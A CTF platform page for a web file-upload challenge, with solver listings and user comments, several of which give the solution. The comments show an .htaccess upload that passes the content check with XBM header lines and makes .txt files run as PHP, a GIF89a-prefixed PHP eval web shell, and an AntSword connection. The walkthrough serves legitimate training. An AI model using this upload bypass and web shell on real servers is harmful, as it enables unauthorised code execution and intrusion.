Upload 2WEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
Max_yiz
一血奖励:
0金币
解 决:
237
提 示:
描 述:
We used a blacklist now ... can you **access** the flag now?\n\n\n\
\ **Author**: souad
评分(2)
解题动态
krioee 攻破了该题 10小时前
余长生o 攻破了该题 4天前
llc123 攻破了该题 5天前
wywitkey 攻破了该题 8天前
梦游的小狐狸 攻破了该题 19天前
dongwanli 攻破了该题 21天前
GnawKing 攻破了该题 22天前
hxnter 攻破了该题 24天前
heping 攻破了该题 27天前
forces 攻破了该题 27天前
wzyloved 攻破了该题 1月前
brant 攻破了该题 1月前
kaiyafanfan123 攻破了该题 1月前
3aybe 攻破了该题 1月前
19513396653 攻破了该题 1月前
slience 攻破了该题 1月前
青菜白玉汤 攻破了该题 1月前
17857024334 攻破了该题 1月前
tjq123 攻破了该题 1月前
评论
wywitkey 8天前
举报
1、上传.htaccess( 包含#define width #define height,这样服务器认为是一个图片文件 );2、上传一句话木马(木马文件格式根据htaccess文件中写的格式);3、蚁剑连接;4、flag.txt在根目录
vincentshine 6月前
举报
两点绕过,非php文件无法被执行,文件内容检查,修改apache配置文件,允许非php文件按照php文件运行执行。
HWHHJ 11月前
举报
逆天题目,还是能做
miko88 9月前
举报
上传的.htaccess和txt不在同一目录,是怎么做的啊
toxi 1年前
举报
只需要把文件后缀的.php换成.php5即可
啊这这 1年前
举报
题目非常好 不过我有个疑问 为什么我上传的shell木马中的提交参数函数必须是REQUEST还要是大写 我尝试了GET POST都不行 大写是语法只能是大写还是其他原因吗
xiaoxiao972521 1年前
举报
可以吧,$_GET $_REQUEST 都行,这些属于php函数,就是这个写法
我不知丢答案 1年前
举报
为什么我上传.user.ini文件去连的时候连不上??
JJhello 1年前
举报
接下面,内容为一句话木马,然后蚁剑连shell.txt的路径即可
JJhello 1年前
举报
上传一个文件名为 ".htaccess",注意,文件名前面没有任何东西的,文件内容为: #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 然后上传shell.txt,内容为
samRsa 1年前
举报
1、bp抓包上传.htaccess #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 2、上传马 GIF89a <?php @eval($_POST['cmd']); ?>
PandaCattle 1年前
举报
看了官方wp就知道有多离谱。。https://github.com/Shellmates/HackINI-2k23-public/blob/main/web/upload-2/solve/README.md